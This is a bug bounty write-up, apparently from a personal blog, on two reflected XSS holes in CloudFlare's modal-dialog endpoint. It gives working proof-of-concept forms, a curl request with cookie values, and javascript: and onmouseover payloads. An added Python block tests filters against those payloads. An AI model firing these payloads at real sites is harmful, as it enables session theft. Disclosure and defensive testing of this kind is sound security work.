XSS in CloudFlare

#1 XSS

These are two of my findings that turned out to be duplicates; I thought I'd share them anyway. Recently I found two POST-based XSS vulnerabilities in CloudFlare, and unfortunately I was not the first to report them.
I found the first issue in the “Confirm Key Generator” dialog box.


Let’s have a closer look at the URL.

/ajax/modal-dialog.html

It looks like the dialog is fetched with an XMLHttpRequest, and the server-side handler behind it accepts our POST request.


After playing around with the “content=” parameter, I noticed that it strips all HTML tags except the following:

<b></b> <p></p> <A HREF="">

Since the <A HREF> tag is not filtered, we can easily execute JavaScript through a javascript: URL:

<A HREF="javascript:alert(document.cookie);">XSS</A>


So the proof of concept would be:

<html>
  <!-- POC by Osanda -->
  <body>
    <form name="exploit" action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
      <input type="hidden" name="type" value="default" />
      <input type="hidden" name="content" value="Go&#032;to&#032;this&#032;link&#032;&lt;A&#032;HREF&#061;&quot;javascript&#058;prompt&#040;&apos;XSS&#032;by&#032;Osanda&apos;&#041;&#059;&quot;&gt;XSS&lt;&#047;A&gt;" />
      <script>document.exploit.submit(); </script>
    </form>
  </body>
</html>

We don’t need to be logged in to trigger the XSS, since the issue is in “modal-dialog.html” itself. Here is the curl command:

curl -i -s -k  -X 'POST' \
    -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: https://www.cloudflare.com/my-account' \
    -b '__cfduid=dcfb031f1436b2c98ee75cfda0b313f9b1395243158470; __utma=1.1850105675.1399902759.1399910158.1400126593.4; __utmz=1.1399902759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.7.10.1400126593; __utmc=1; vses2=9pvibldsqecve4b63ef9h13h75; __cf_effload=1' \
    --data-binary $'type=default&content=Go to this link <A HREF=\"javascript:prompt(\'XSS by Osanda\');\">XSS</A>' \
    'https://www.cloudflare.com/ajax/modal-dialog.html'

That is it, game over 🙂


#2 XSS

The second XSS issue was in the “zoneupload” parameter of the same “modal-dialog.html” file. In the previous scenario the HTML tags were stripped, but here they are instead converted into HTML entities. How to bypass this one? 😉


Well, as usual, the characters " ' ( ) are not filtered 🙂

ABC" onmouseover="prompt('XSS by Osanda') ""


Here is the proof of concept:

<html>
  <body>
    <form action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
      <input type="hidden" name="type" value="zoneupload" />
      <input type="hidden" name="z" value="google&#046;lk" />
      <input type="hidden" name="target" value="ABC&quot;&#032;onmouseover&#061;&quot;prompt&#040;&apos;XSS&#032;by&#032;Osanda&apos;&#041;&#032;&quot;&quot;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

So yeah, here we go, XSS again 😀
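As an added defensive illustration (not code from this post or from CloudFlare), here is a small Python check for both filter weaknesses described above: a URL-scheme allowlist for the <A HREF> that survives the first filter, and full attribute encoding for the second, using the post's own payloads as constructed test input. html.escape, urlparse and HTMLParser are standard-library calls; the <input> template and the allowlisted schemes are assumptions for the demo.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed test input, copied from the two payloads quoted in the post.
ANCHOR_PAYLOAD = "javascript:alert(document.cookie);"
ATTR_PAYLOAD = "ABC\" onmouseover=\"prompt('XSS by Osanda') \"\""

# Fix for #1: if <a href> survives the tag allowlist, the URL scheme must be checked too.
ALLOWED_SCHEMES = {"http", "https", "mailto"}  # assumed allowlist for this demo

def href_is_safe(url: str) -> bool:
    """Accept relative links and allowlisted schemes; reject javascript:, data:, etc.
    Tabs and newlines are removed first because browsers ignore them inside a scheme."""
    cleaned = "".join(ch for ch in url if ch not in "\t\r\n").strip()
    scheme = urlparse(cleaned).scheme  # urlparse lower-cases the scheme for us
    return scheme == "" or scheme in ALLOWED_SCHEMES

# Fix for #2: encoding only < and > is not enough inside a quoted attribute.
def weak_escape(value: str) -> str:
    """Mimics the filter in the post: angle brackets encoded, quotes left alone."""
    return value.replace("<", "&lt;").replace(">", "&gt;")

def render_weak(value: str) -> str:
    return f'<input type="hidden" name="target" value="{weak_escape(value)}">'

def render_safe(value: str) -> str:
    # quote=True also encodes " and ', so the value cannot close the attribute early
    return f'<input type="hidden" name="target" value="{html.escape(value, quote=True)}">'

class _TagAttrs(HTMLParser):
    """Records the attributes a browser-like parser sees on the rendered tag."""
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.attrs.update(attrs)

def parsed_attributes(markup: str) -> dict:
    parser = _TagAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs

def event_handlers(markup: str) -> list:
    """Any on* attribute means the injected value broke out of its quotes."""
    return sorted(name for name in parsed_attributes(markup) if name.startswith("on"))

def value_round_trips(markup: str, original: str) -> bool:
    """Correct encoding returns the whole original string as the value attribute."""
    return parsed_attributes(markup).get("value") == original
```

With the weak encoder the parser sees value="ABC" plus an onmouseover attribute; with html.escape(quote=True) the entire payload comes back as inert attribute text.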


Bug hunting is not all about getting your name in halls of fame, receiving rewards or being the first to report. I just enjoy finding vulnerabilities and love to learn something new 🙂


11 thoughts on “XSS in CloudFlare”

  1. Dude, nice findings, and I like your wallpaper. Wanna share?

  2. Thanks for your marvelous posting! I actually enjoyed reading it, you
    could be a great author. I will be sure to
    bookmark your blog and will come back in the foreseeable future.
    I want to encourage you to continue your great posts, have a nice morning!
